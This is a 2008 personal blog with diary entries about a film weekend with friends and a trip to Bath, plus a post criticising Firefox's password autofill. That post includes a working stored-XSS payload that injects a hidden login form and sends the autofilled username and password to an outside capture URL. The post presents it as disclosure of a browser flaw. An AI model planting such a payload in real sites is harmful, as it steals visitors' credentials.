radiac.net

diary - latest entries

LAAFF 2008 Report

27th August 2008 at 22:52 (1 comment)

It has been 2 and a half weeks since LAAFF, so it must be time for a report! The Friday evening saw Tristan, Mark and Meri arrive, followed shortly after by Peter and Charlene, who brought Rock Band. I cooked pizzas and sausage rolls until everyone was full, then I cooked some more just in case. Rock Band was played into the night, and resumed in the morning while Laura, Natalie and Simon arrived. We then ate more food, played Mario Kart, and watched the excellent "Ninja Dragon" (which clearly wasn't two unrelated films randomly spliced together) before going out for a curry at the finest Indian restaurant in town. We watched another film, played Soul Calibur, slept (there was room for everyone, hurrah), and then played Mario Kart some more before the LAAFF shuttle service took people off to the station. I thought people would drift away gradually depending on how far away they lived, but within an hour of the first person leaving, the house was empty again. Sadness. But apparently everyone had a good time, which is excellent. Thank you to everyone who came, and I know some of you had particularly long journeys, but it was good to meet up again. To re-live the good times, or for the curious non-LAAFF-ers, Natalie has provided photographic proof of the event on Flickr.

There has been much news in the past month, but also much activity. More posts shall follow!

LAAFF 2008

8th August 2008 at 10:31 (4 comments)

This weekend is the 117th LAAFF: Annual Atrocious Film Festival, and is being held in Cheltenham. The organisers are expecting better attendance than the previous 114 film festivals - which consisted of me slowly working my way through my DVD collection.

I'm now expecting 8 friends from uni to arrive at my flat at some point today or tomorrow. This is sadly down from 10 as two had to drop out, but the up side is that 8 people are more likely to fit in my flat than 10. Especially as they will be sleeping on the floor.

I am now away to buy lots of food. Which will be fun - I don't know when the 8 people are arriving, so I have to buy enough food for 8, but not too much for 4. A challenge indeed, but one that I shall relish. Ooh, relish, there's an idea.

And just to clear up any confusion, the L in LAAFF has to stand for something different every time it's used. That is the law of absurd backronyms.

It's been a while

22nd July 2008 at 19:27 (3 comments)

No entries for weeks? That can mean only one thing - it's business as usual at chateau radiac.

Well, not quite; last week we had a couple of days off and went down to Bath for the day. Went into the bath spa thing for a couple of hours - was very relaxing, especially the steam rooms. Then went over to Shakeaway and had a wander round looking for pigs:

I have also finally joined twitter, so add me or follow me whatever it is you do on this thing.

In my free time over the past few weeks I've been playing with lots of other things on my "really should do that sometime" list, like trying to sync google calendars with my N95, fiddling with some interesting perl modules, reading around other frameworks to get interesting ideas, and buying more domains for sites that definitely will be written at some point in the distant future. Right now I'm fighting with my N95, trying to figure out why it doesn't show up in Vista, combining two of my favouritest things: Vista, and Nokia software. Good times.

What is wrong with me?

3rd July 2008 at 18:20 (Comment)

Seen moments ago:

rm -rf /usr/lolcat/nginx

That's some serious typo skills - some part of my brain meant to write that. You know that bit in that show where that guy realises he's going insane? I'm that guy.

I am in your Firefox, stealing your Passwords

25th June 2008 at 21:39 (3 comments)

The Firefox developers have their security and usability priorities all muddled up. You can't access my self-signed website, but I can steal your passwords without you even knowing. And they think this makes your browser better.

In Firefox 3, they introduced stricter SSL certificate checks that give you an error page that you can't turn off. It's a usability nightmare if it's a site you want to get into; there are 4 mouse clicks, all over the screen, to add the site - amusingly, 5 if you only want to add it temporarily. Reminds me of Vista UAC. Extremely annoying for people who may run several HTTPS sites on a dev machine, or who need to access scripts on specific machines behind a load-balanced secure site, for example.

Sacrificing usability for security is something I can forgive, even condone - although I can't see quite what's so bad about the way IE 7 does it, with a big warning saying "Actually, you don't want to open this". However, it's not a sacrifice Firefox wants to make across the board. Look at the password manager.

Just log in once, and whenever you open another page on the site that prompts for your username and password, it'll pre-populate it for you. Handy, eh?

I'm not talking about an autocomplete option when you start typing, like they do in IE; no, it fills it out for you as soon as you open the page. I thought this was new to FF3, but looking back they've been doing it in FF2 too.

Significant usability gain? No. In fact, they've "improved" form detection in FF3 and have made it a usability nightmare. Now it does it anywhere it finds a password field, regardless of context. Imagine a form on a site that prompts you for a password to a different resource; it's now always populated with the wrong password. Or more commonly, imagine a form that lets you change your details, and has a field to change your password if you provide your current one. Click save and *ding*! Error! Or even better, you've now got a blank password (and don't know why you can't log back in). Now they're sacrificing usability for usability!

Bugzilla comments say if you've got a form like that, you should set the autocomplete="no" form attribute. Great, but that's like saying they're now not going to render HTML if it contains presentational markup - I'm screwed on a major proportion of sites I use.

But wait, why am I talking about mere annoyances, when I can be talking about a vulnerability, at least when combined with XSS. Let me show you:

  1. Log in to a site that doesn't parse user comments properly.
  2. Leave a new comment:
    I LOVE THIS SITE, AAA+++++++=+++!!!1!
    <script>
    document.write('<form style="display:none">' +
      '<input type="text" name="username" id="username">' +
      '<input type="password" name="password"></form>');
    window.onload = function () {
      (new Image).src = 'http://radiac.net/capture?u=' +
        document.getElementsByName('username')[0].value +
        '&p=' + document.getElementsByName('password')[0].value
      ;
    }
    </script>
    
  3. Profit.

That's just the quick version before we start trying. And the best bit? There are bug reports about this in Bugzilla going back to 2006. The response to that bug was the same as to similar bugs being submitted now:

I don't think we should sacrifice usability this much just to slightly mitigate the effect of a successful XSS attack.

Slightly mitigate the effect? Slightly?! I just stole all your visitors' usernames and passwords!

Other comments say once a site's been injected with malicious code, it's already game over, but this isn't some obscure Quicktime hack that'll only last until the next bug fix - this is an officially sanctioned feature. With this, it doesn't matter if I can't inject code onto the login page to sniff keypresses, or if you do clever stuff with your session cookies to make sure they can't be copied - all I need is one tiny corner of your site, and I have their password. I am now them.

Still, at least they don't have to click two buttons to select their login from the dropdown. I'm sure that'll keep them happy while I'm finding out which other sites I can now access. Please, just let me get one for play.